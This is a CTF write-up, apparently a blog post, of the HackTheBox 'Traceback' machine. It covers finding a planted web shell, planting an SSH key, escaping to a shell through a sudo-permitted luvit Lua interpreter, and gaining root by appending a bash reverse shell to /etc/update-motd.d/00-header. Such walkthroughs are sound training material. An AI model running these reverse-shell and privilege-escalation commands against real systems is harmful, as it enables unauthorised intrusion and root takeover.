HackTheBox — Traceback

Summary

Traceback is a easy flag with ip 10.10.10.181

Enumeration

Nmap

Web Enum

I tried to take a look for source

From the hint, I searched for Xh4H web shells, I found some shells

I dumped all shells names on txt file and used gobuster

I used admin:admin credentials to login

After that i deleted the default authorized_keys and upload my one

Let’s login now

Get user sysadmin

$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit

Afetr searching about lua
Create lua command shell:

echo "local t = os.execute('/bin/sh')" > rev.lua

execute rev.lua as sysadmin without password to get user:

sudo -u sysadmin /home/sysadmin/luvit rev.lua

Gain user flag!

Privilege Escalation

Enumerating the box using linpeas we see that we can modify files inside /etc/update-motd.d

I found this article that took about mot.d

I added a bash rev shell to 00-header

echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/4334 0>&1'" >> /etc/update-motd.d/00-header

listen on port 4334 and ssh to the box from another terminal

Now if we ssh as webadmin, Should get root

root@strike:~# ssh -i id_rsa webadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

8c221146c17c2a973a846f49xxxxxxxx


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Aug 15 06:23:37 2020 from 10.10.14.53
webadmin@traceback:~$

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

--

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Delivery of license keys completed

SoftwareMill’s 2018 wrap up

Insecure Deserialization :-

Here’s an article written by an AI on the topic ‘Artificial Intelligence and Copywriting’

Our journey with Apache Kafka

What is a coding bootcamp?

CS 373 Spring 2021 Blog Last EntryZein Fakhreddine

Data compressions in Kafka

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

Attacktive Directory TryHackMe

OSCP BOF Prep[TryHackMe]

TryHackMe: Intro to Malware Analysis [Write-up]

Simple CTF TryHackMe Walkthrough